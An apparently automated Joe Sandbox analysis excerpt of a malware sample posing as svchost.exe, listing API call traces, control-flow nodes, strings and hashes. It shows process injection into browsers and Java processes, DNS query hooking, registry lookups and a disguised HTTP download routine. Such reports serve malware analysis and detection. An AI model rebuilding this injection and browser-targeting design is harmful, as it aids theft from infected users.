2d3793f 65706->65716 65707->65707 65713 2d37af9 65707->65713 65708->65704 65709->65691 65710->65701 65712 2d379ef GetProcessHeap HeapFree 65710->65712 65712->65701 65714 2d37b0b RegNotifyChangeKeyValue 65713->65714 65808 2d445e0 22 API calls 65713->65808 65714->65707 65716->65716 65717 2d379be RegSetValueExA 65716->65717 65717->65710 65809 2d40de0 43 API calls 65718->65809 65810 2d41fa0 43 API calls 65719->65810 65811 2d42c90 43 API calls 65721->65811 65812 2d42f60 43 API calls 65725->65812 65813 2d412a0 44 API calls 65728->65813 65814 2d3ff20 43 API calls 65734->65814 65815 2d40790 43 API calls 65735->65815 65816 2d3edd0 44 API calls 65736->65816 65817 2d3c1f0 44 API calls 65740->65817 65742 2d37327 Process32First 65741->65742 65743 2d3741c 65741->65743 65744 2d37347 65742->65744 65745 2d373f9 GetHandleInformation 65742->65745 65743->65672 65748 2d373e3 Process32Next 65744->65748 65749 2d3735d GetCurrentProcessId 65744->65749 65751 2d37390 EnterCriticalSection GetProcessHeap RtlAllocateHeap 65744->65751 65752 2d373d2 LeaveCriticalSection 65744->65752 65753 2d44450 9 API calls 65744->65753 65787 2d44550 OpenProcess 65744->65787 65745->65743 65746 2d3740f 65745->65746 65746->65743 65747 2d37415 FindCloseChangeNotification 65746->65747 65747->65743 65748->65744 65748->65745 65749->65748 65750 2d3736b StrStrIA 65749->65750 65750->65744 65750->65751 65751->65744 65751->65752 65752->65748 65753->65744 65756 2d448e6 65755->65756 65763 2d44b19 65755->65763 65758 2d44917 65756->65758 65759 2d4490d Sleep 65756->65759 65756->65763 65794 2d452d0 memset CreateToolhelp32Snapshot 65756->65794 65760 2d452d0 11 API calls 65758->65760 65759->65756 65759->65758 65761 2d4491e 65760->65761 65762 2d44926 OpenProcess 65761->65762 65761->65763 65762->65763 65764 2d44941 GetModuleHandleA 65762->65764 65763->65672 65765 2d4495d GetProcAddress 65764->65765 65766 2d44978 65764->65766 65765->65766 65769 2d4496b GetCurrentProcess 65765->65769 65767 2d449b1 VirtualAllocEx 65766->65767 65768 2d4497e GetModuleHandleA 65766->65768 65772 2d44af6 GetHandleInformation 65767->65772 65773 2d449e7 WriteProcessMemory 65767->65773 65770 2d44994 GetProcAddress 65768->65770 65771 2d449a0 65768->65771 65769->65766 65770->65771 65771->65767 65771->65772 65772->65763 65774 2d44b0c 65772->65774 65775 2d44a80 FlushInstructionCache CreateRemoteThread 65773->65775 65776 2d44a12 65773->65776 65774->65763 65777 2d44b12 CloseHandle 65774->65777 65779 2d44ad4 RtlCreateUserThread 65775->65779 65780 2d44aa8 GetHandleInformation 65775->65780 65778 2d44a15 VirtualAlloc 65776->65778 65784 2d44a7a 65776->65784 65777->65763 65778->65776 65781 2d44a2d memcpy WriteProcessMemory VirtualFree 65778->65781 65779->65772 65782 2d44abe 65780->65782 65783 2d44acb 65780->65783 65781->65776 65782->65783 65785 2d44ac4 CloseHandle 65782->65785 65783->65772 65784->65775 65785->65783 65786->65672 65788 2d445c9 65787->65788 65789 2d44589 GetProcessTimes 65787->65789 65788->65744 65790 2d445a4 65789->65790 65791 2d445aa GetHandleInformation 65789->65791 65790->65791 65791->65788 65792 2d445bc 65791->65792 65792->65788 65793 2d445c2 CloseHandle 65792->65793 65793->65788 65795 2d45310 GetLastError 65794->65795 65796 2d45368 Module32First 65794->65796 65797 2d4531f SwitchToThread CreateToolhelp32Snapshot 65795->65797 65798 2d453cb 65795->65798 65799 2d45384 65796->65799 65806 2d45335 65796->65806 65797->65798 65797->65806 65798->65756 65800 2d45390 StrStrIA 65799->65800 65803 2d453a2 StrStrIA 65800->65803 65804 2d453ae Module32Next 65800->65804 65801 2d45343 GetHandleInformation 65802 2d4535f 65801->65802 65805 2d45352 65801->65805 65802->65756 65803->65804 65803->65806 65804->65800 65804->65806 65805->65802 65807 2d45358 CloseHandle 65805->65807 65806->65801 65806->65802 65807->65802 65808->65714
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02D23440: memset.MSVCRT ref: 02D2347B
                                                                                                                                                                                                                  • Part of subcall function 02D23440: GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02D2349A
                                                                                                                                                                                                                  • Part of subcall function 02D23440: PathAddBackslashA.SHLWAPI(?), ref: 02D234A7
                                                                                                                                                                                                                  • Part of subcall function 02D23440: GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02D234C4
                                                                                                                                                                                                                  • Part of subcall function 02D23440: _snprintf.MSVCRT ref: 02D234DF
                                                                                                                                                                                                                  • Part of subcall function 02D23440: RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02D23503
                                                                                                                                                                                                                  • Part of subcall function 02D23440: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02D2351F
                                                                                                                                                                                                                  • Part of subcall function 02D23440: PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02D235AD
                                                                                                                                                                                                                  • Part of subcall function 02D455C0: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02D455EF
                                                                                                                                                                                                                  • Part of subcall function 02D455C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02D45628
                                                                                                                                                                                                                  • Part of subcall function 02D455C0: _snprintf.MSVCRT ref: 02D45693
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\user\AppData\Roaming\), ref: 02D367F0
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(C:\Users\user\AppData\Roaming\), ref: 02D367FB
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D3680F
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02D3682B
                                                                                                                                                                                                                • GetCommandLineA.KERNEL32 ref: 02D36835
                                                                                                                                                                                                                • GetCommandLineW.KERNEL32 ref: 02D3686D
                                                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(02D6FB68), ref: 02D3689B
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02D368B2
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D33140,00000000,00000000,00000000), ref: 02D36900
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D36914
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D36925
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D37820,00000000,00000000,00000000), ref: 02D36954
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D36968
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D36979
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D37B30,00000000,00000000,00000000), ref: 02D3698E
                                                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(02D6FB80), ref: 02D3699F
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D37430,00000000,00000000,00000000), ref: 02D369B0
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D369C4
                                                                                                                                                                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 02D369D5
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D36510,00000000,00000000,00000000), ref: 02D369EF
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D36A03
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D36A14
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D35020,00000000,00000000,00000000), ref: 02D36A3E
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D36A52
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D36A63
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D36A72
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D36A75
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D36A82
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D36A85
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02D36AA9
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02D36ABB
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 02D36AC7
                                                                                                                                                                                                                  • Part of subcall function 02D26A50: memset.MSVCRT ref: 02D26A81
                                                                                                                                                                                                                  • Part of subcall function 02D26A50: memset.MSVCRT ref: 02D26A9F
                                                                                                                                                                                                                  • Part of subcall function 02D26A50: RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 02D26ABB
                                                                                                                                                                                                                  • Part of subcall function 02D26A50: RegQueryValueExA.ADVAPI32(?,A1633BD9a,00000000,00000001,?,00000104), ref: 02D26AE2
                                                                                                                                                                                                                  • Part of subcall function 02D26A50: GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02D26B5A
                                                                                                                                                                                                                  • Part of subcall function 02D26A50: HeapAlloc.KERNEL32(00000000), ref: 02D26B61
                                                                                                                                                                                                                  • Part of subcall function 02D26A50: memset.MSVCRT ref: 02D26B75
                                                                                                                                                                                                                  • Part of subcall function 02D26A50: lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02D26B8E
                                                                                                                                                                                                                  • Part of subcall function 02D26A50: RegCloseKey.ADVAPI32(?), ref: 02D26B9C
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D36AD6
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\svchost.exe), ref: 02D36AF2
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\iexplore.exe), ref: 02D36B19
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\java.exe), ref: 02D36B2F
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\javaw.exe), ref: 02D36B45
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\javaws.exe), ref: 02D36B5B
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\opera.exe), ref: 02D36B71
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\firefox.exe), ref: 02D36B87
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\maxthon.exe), ref: 02D36B9D
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\avant.exe), ref: 02D36BB3
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\mnp.exe), ref: 02D36BC9
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\safari.exe), ref: 02D36BDF
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\netscape.exe), ref: 02D36BF5
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\tbb-firefox.exe), ref: 02D36C0B
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\frd.exe), ref: 02D36C21
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02D36C37
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02D36C4D
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D3B3F0,00000000,00000000,00000000), ref: 02D36C7B
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D36C95
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D36CA2
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D3EA80,00000000,00000000,00000000), ref: 02D36CB7
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D36CCB
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D36CD8
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D40070,00000000,00000000,00000000), ref: 02D36CED
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D36D01
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D36D0E
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D408E0,00000000,00000000,00000000), ref: 02D36D23
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D36D37
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D36D44
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D3F1B0,00000000,00000000,00000000), ref: 02D36D59
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D36D6D
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D36D7A
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D3C670,00000000,00000000,00000000), ref: 02D36D8F
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D36DA3
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D36DB0
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D3C710,00000000,00000000,00000000), ref: 02D36DC5
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D36DD9
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D36DE6
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D41060,00000000,00000000,00000000), ref: 02D36DFB
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D36E0F
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D36E1C
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D420F0,00000000,00000000,00000000), ref: 02D36E31
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D36E45
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D36E52
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D42DE0,00000000,00000000,00000000), ref: 02D36E67
                                                                                                                                                                                                                  • Part of subcall function 02D3A240: CreateMutexA.KERNEL32(00000000,00000000,00000000,75B07390,?,?,02D36AFD), ref: 02D3A25A
                                                                                                                                                                                                                  • Part of subcall function 02D3A240: CreateThread.KERNEL32(00000000,00000000,02D3A2B0,00000000,00000000,00000000), ref: 02D3A274
                                                                                                                                                                                                                  • Part of subcall function 02D3A240: GetHandleInformation.KERNEL32(00000000,?,?,?,02D36AFD), ref: 02D3A28C
                                                                                                                                                                                                                  • Part of subcall function 02D3A240: CloseHandle.KERNEL32(00000000,?,?,02D36AFD), ref: 02D3A29D
                                                                                                                                                                                                                  • Part of subcall function 02D26070: IsUserAnAdmin.SHELL32 ref: 02D26070
                                                                                                                                                                                                                  • Part of subcall function 02D26070: DnsFlushResolverCache.DNSAPI ref: 02D2607A
                                                                                                                                                                                                                  • Part of subcall function 02D26070: LoadLibraryExA.KERNEL32(Dnsapi.dll,00000000,00000000,75B07390), ref: 02D2608A
                                                                                                                                                                                                                  • Part of subcall function 02D26070: GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 02D260A3
                                                                                                                                                                                                                  • Part of subcall function 02D26070: GetProcAddress.KERNEL32(00000000,DnsQuery_UTF8), ref: 02D260BF
                                                                                                                                                                                                                  • Part of subcall function 02D26070: GetProcAddress.KERNEL32(00000000,DnsQuery_W), ref: 02D260DB
                                                                                                                                                                                                                  • Part of subcall function 02D26070: GetProcAddress.KERNEL32(00000000,Query_Main), ref: 02D260F7
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 02D3714F
                                                                                                                                                                                                                  • Part of subcall function 02D44450: OpenProcess.KERNEL32(00000400,00000000,00000000,74DEF550,00000000,76EEC3F0), ref: 02D44465
                                                                                                                                                                                                                  • Part of subcall function 02D44450: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,?,?,?,02D353C3), ref: 02D4447C
                                                                                                                                                                                                                  • Part of subcall function 02D44450: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02D4449A
                                                                                                                                                                                                                  • Part of subcall function 02D44450: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02D353C3), ref: 02D444B2
                                                                                                                                                                                                                  • Part of subcall function 02D44450: GetHandleInformation.KERNEL32(?,00000000), ref: 02D4450B
                                                                                                                                                                                                                  • Part of subcall function 02D44450: FindCloseChangeNotification.KERNEL32(?), ref: 02D4451C
                                                                                                                                                                                                                  • Part of subcall function 02D44450: GetHandleInformation.KERNEL32(00000000,?), ref: 02D4452E
                                                                                                                                                                                                                  • Part of subcall function 02D44450: CloseHandle.KERNEL32(00000000), ref: 02D4453F
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02D3715E
                                                                                                                                                                                                                • GetThreadDesktop.USER32(00000000,00000002,?,00000100,00000000), ref: 02D37177
                                                                                                                                                                                                                • GetUserObjectInformationA.USER32(00000000), ref: 02D3717E
                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,a1633b6ba), ref: 02D37194
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D2BA40,00000000,00000000,00000000), ref: 02D371A8
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D371C0
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D371D1
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D27D50,00000000,00000000,00000000), ref: 02D371E6
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D371FE
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D3720F
                                                                                                                                                                                                                  • Part of subcall function 02D2D7A0: GetComputerNameA.KERNEL32(02D6F588,?), ref: 02D2D7B7
                                                                                                                                                                                                                  • Part of subcall function 02D2D7A0: lstrlenA.KERNEL32(02D6F588,?,?,?,02D3714F), ref: 02D2D7C2
                                                                                                                                                                                                                  • Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D802
                                                                                                                                                                                                                  • Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D812
                                                                                                                                                                                                                  • Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D822
                                                                                                                                                                                                                  • Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D82F
                                                                                                                                                                                                                  • Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D83C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$Information$CreateThread$Close$Process$Heap$AddressProcwsprintf$OpenPathmemset$CurrentUser$AdminBackslashChangeCommandCriticalFileFindInitializeLineModuleMutexNameNotificationQuerySectionTokenValueVolume_snprintf$AllocCacheCharComputerDesktopDirectoryEnvironmentExistsFlushFolderFreeLibraryLoadObjectResolverSystemUpperValidateVariableWindowslstrcmpilstrcpynlstrlen
                                                                                                                                                                                                                • String ID: --no-sandbox$ --no-sandbox$A1633F27a$C:\Users\user\AppData\Roaming\$IsWow64Process$RtlFreeHeap$\avant.exe$\cbsmain.dll$\chrome.exe$\clmain.exe$\core.exe$\explorer.exe$\firefox.exe$\frd.exe$\iexplore.exe$\intpro.exe$\ipc_full.exe$\isclient.exe$\java.exe$\javaw.exe$\javaws.exe$\maxthon.exe$\mnp.exe$\netscape.exe$\notepad.exe$\opera.exe$\rundll32.exe$\safari.exe$\svchost.exe$\tbb-firefox.exe$a1633b6ba$kernel32.dll$ntdll.dll
                                                                                                                                                                                                                • API String ID: 1297835225-2267504579
                                                                                                                                                                                                                • Opcode ID: c16f22a31ff9b8cf07b7290fa7587aa4c1e1196538d2959d42076917c128b91e
                                                                                                                                                                                                                • Instruction ID: 3fcba56df54f7eb2ce729b4b32996a29751a6c0e02a45d12cc04e1ee91fd4d9e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c16f22a31ff9b8cf07b7290fa7587aa4c1e1196538d2959d42076917c128b91e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4652A371A81315B6FB2297A0DD09FAE77A8AF04B44F644544FA05B63C4DBB0DE44CAF8

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 201 2d34680-2d346cd memset 202 2d346d3-2d346d6 201->202 203 2d34ae5-2d34aed 201->203 202->203 204 2d346dc-2d346df 202->204 205 2d34780-2d3479c InternetOpenA 204->205 206 2d346e5-2d346ec 204->206 207 2d347a2-2d347bb InternetConnectA 205->207 208 2d34a8a 205->208 209 2d34719-2d3471e 206->209 210 2d346ee-2d34708 GetProcessHeap HeapAlloc 206->210 207->208 215 2d347c1-2d347cb 207->215 214 2d34a90-2d34a95 208->214 209->203 213 2d34724-2d3473f memcpy 209->213 211 2d34716 210->211 212 2d3470a-2d34713 memset 210->212 211->209 212->211 216 2d34740-2d3474e 213->216 217 2d34ab3-2d34abd 214->217 218 2d34a97-2d34aa5 GetProcessHeap HeapValidate 214->218 219 2d347d2-2d347f3 HttpOpenRequestA 215->219 220 2d347cd 215->220 216->216 222 2d34750 216->222 224 2d34ac5-2d34aca 217->224 225 2d34abf-2d34ac3 InternetCloseHandle 217->225 218->217 223 2d34aa7-2d34aad GetProcessHeap HeapFree 218->223 219->208 221 2d347f9-2d34802 219->221 220->219 226 2d34804-2d34808 221->226 227 2d3481d 221->227 228 2d34752-2d34763 222->228 223->217 229 2d34acf-2d34ad4 224->229 230 2d34acc-2d34acd InternetCloseHandle 224->230 225->224 226->227 231 2d3480a-2d3481b HttpAddRequestHeadersA 226->231 232 2d34820-2d34833 HttpAddRequestHeadersA 227->232 233 2d34767-2d3476e 228->233 234 2d34765 228->234 235 2d34ad6-2d34ad7 InternetCloseHandle 229->235 236 2d34ad9-2d34ae2 229->236 230->229 231->232 237 2d34865-2d3486a 232->237 238 2d34835-2d34863 _snprintf HttpAddRequestHeadersA 232->238 233->228 239 2d34770-2d3477b call 2d37c10 233->239 234->233 235->236 240 2d3486f-2d34881 HttpSendRequestA 237->240 241 2d3486c 237->241 238->237 239->205 240->208 243 2d34887-2d348a4 HttpQueryInfoA 240->243 241->240 243->208 244 2d348aa-2d348b1 243->244 244->208 245 2d348b7-2d348df CreateFileA 244->245 245->208 246 2d348e5-2d348ff GetProcessHeap HeapAlloc 245->246 247 2d34905-2d34932 memset InternetReadFile 246->247 248 2d349c9-2d349cb 246->248 251 2d34934-2d34939 247->251 252 2d349ad-2d349bb GetProcessHeap HeapValidate 247->252 249 2d349f0-2d34a04 call 2d27220 248->249 250 2d349cd-2d349e1 GetHandleInformation 248->250 249->214 260 2d34a0a-2d34a14 249->260 250->249 254 2d349e3-2d349e7 250->254 251->252 256 2d3493b-2d34992 SetFilePointer LockFile WriteFile UnlockFile GetProcessHeap HeapValidate 251->256 252->248 253 2d349bd-2d349c3 GetProcessHeap HeapFree 252->253 253->248 254->249 258 2d349e9-2d349ea CloseHandle 254->258 256->246 257 2d34998-2d349a8 GetProcessHeap HeapFree 256->257 257->246 258->249 261 2d34a20-2d34a2e 260->261 261->261 262 2d34a30 261->262 263 2d34a32-2d34a43 262->263 264 2d34a47-2d34a4e 263->264 265 2d34a45 263->265 264->263 266 2d34a50-2d34a67 call 2d37c10 call 2d27140 264->266 265->264 270 2d34a6c-2d34a7a GetProcessHeap HeapValidate 266->270 270->214 271 2d34a7c-2d34a88 GetProcessHeap HeapFree 270->271 271->214
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D346BD
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,02D26C17,Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),?), ref: 02D346F7
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02D346FE
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D3470E
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 02D3472D
                                                                                                                                                                                                                • InternetOpenA.WININET(?,00000000,00000000,00000000,04000000), ref: 02D34791
                                                                                                                                                                                                                • InternetConnectA.WININET(00000000,02D26C17,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02D347B0
                                                                                                                                                                                                                • HttpOpenRequestA.WININET(?,GET,?,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02D347E8
                                                                                                                                                                                                                • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02D34819
                                                                                                                                                                                                                • HttpAddRequestHeadersA.WININET(?,Referer: http://www.google.com,000000FF,20000000), ref: 02D3482D
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D3484B
                                                                                                                                                                                                                • HttpAddRequestHeadersA.WININET(?,?,000000FF,20000000), ref: 02D34863
                                                                                                                                                                                                                • HttpSendRequestA.WININET(?,00000000,00000000,?,?), ref: 02D34879
                                                                                                                                                                                                                • HttpQueryInfoA.WININET(?,20000013,?,00000004,?), ref: 02D3489C
                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02D348D4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00001010), ref: 02D348F2
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02D348F5
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D3490D
                                                                                                                                                                                                                • InternetReadFile.WININET(?,00000000,00001000,?), ref: 02D3492A
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D3494B
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02D3495B
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02D3496A
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 02D3497A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D34983
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D3498A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D3499B
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D349A2
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D349B0
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D349B3
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D349C0
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D349C3
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D349D9
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D349EA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D34A6F
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D34A72
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D34A7F
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D34A82
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D34A9A
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D34A9D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • HTTP/1.0, xrefs: 02D347E0
                                                                                                                                                                                                                • 3eaeb407628e78f, xrefs: 02D34835
                                                                                                                                                                                                                • POST, xrefs: 02D347CD, 02D347E6
                                                                                                                                                                                                                • Referer: http://www.google.com, xrefs: 02D34827
                                                                                                                                                                                                                • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02D3468A
                                                                                                                                                                                                                • GET, xrefs: 02D347C4
                                                                                                                                                                                                                • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02D3483A
                                                                                                                                                                                                                • Content-Type: application/x-www-form-urlencoded, xrefs: 02D34811
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
